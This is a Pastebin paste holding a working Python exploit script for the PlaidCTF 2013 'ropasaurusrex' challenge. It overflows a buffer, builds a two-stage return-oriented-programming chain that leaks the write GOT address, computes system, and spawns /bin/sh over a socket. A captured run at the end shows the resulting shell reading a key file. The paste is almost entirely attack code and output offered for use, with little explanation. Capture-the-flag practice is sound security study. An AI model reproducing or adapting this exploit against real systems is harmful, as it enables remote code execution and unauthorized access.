Guest User

plaid ctf 2013 ropasaurusrex

a guest
Nov 11th, 2013
173
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import os
  2. import struct
  3. from socket import *
  4. import time
  5.  
  6. def GOT_SHELL(sock):
  7.     command=""
  8.     while(command != 'quit'):
  9.          command=raw_input("> ")
  10.          sock.send(command+"\n")
  11.          time.sleep(0.5)
  12.          print sock.recv(0x4096)
  13.     return
  14.  
  15. p = lambda x : struct.pack("<L", x)
  16. up = lambda x : struct.unpack("<L", x)
  17.  
  18. ip = "192.168.0.103"
  19. port = 12312 # my server
  20.  
  21. s = socket(AF_INET, SOCK_STREAM)
  22. s.connect((ip, port))
  23.  
  24. #write = dfcd0
  25. #system = 41280
  26.  
  27. OFFSET = 0x9ea50
  28.  
  29. freespace = 0x08049629
  30. ppppr = 0x080484b5
  31. write = 0x0804830c
  32. read = 0x0804832c
  33. write_got = 0
  34. system = 0
  35. cmd = "/bin/sh"
  36. sh = 0x0804867f
  37.  
  38. ############################################################################ stage1
  39. payload = ""
  40. payload += "A"*0x88
  41. payload += "BBBB"
  42.  
  43. payload += p(write) # ret
  44. payload += p(ppppr+1) # pppr
  45. payload += p(1) # stdout
  46. payload += p(0x08049614) # get write_got
  47. payload += p(4) # size
  48.  
  49. payload += p(read) # ret
  50. payload += p(ppppr+1) # ppr
  51. payload += p(0)
  52. payload += p(freespace)
  53. payload += p(len(cmd))
  54.  
  55. payload += p(0x0804841d) # return to vuln function
  56.  
  57. print "[*] Sending Stage 1 . . ."
  58. s.send(payload)
  59. time.sleep(0.5)
  60.  
  61. print "[*] Sending Command "+cmd+" . . ."
  62. s.send(cmd)
  63.  
  64. write_got = up(s.recv(2048))[0]
  65. print "[!] system addr : "+hex(write_got)
  66.  
  67. ############################################################################ stage2
  68. payload = ""
  69. payload += "A"*0x8c
  70. payload += p(write_got - OFFSET) # write system
  71. payload += "AAAA"
  72. #payload += p(sh)
  73. payload += p(freespace)
  74.  
  75. #####################################################################################
  76.  
  77. print "[*] Sending Stage 2 . . ."
  78. s.send(payload)
  79. GOT_SHELL(s)
  80.  
  81. raw_input("Got Shell?")
  82. """
  83. C:\Users\Administrator\Desktop\sweetchip>exploit.py
  84. [*] Sending Stage 1 . . .
  85. [*] Sending Command /bin/sh . . .
  86. [!] system addr : 0xb7649cd0L
  87. [*] Sending Stage 2 . . .
  88. > whoami
  89. sweetchip
  90.  
  91. > cat /home/sweetchip/key
  92. This is K3y
  93.  
  94. >
  95. """
RAW Paste Data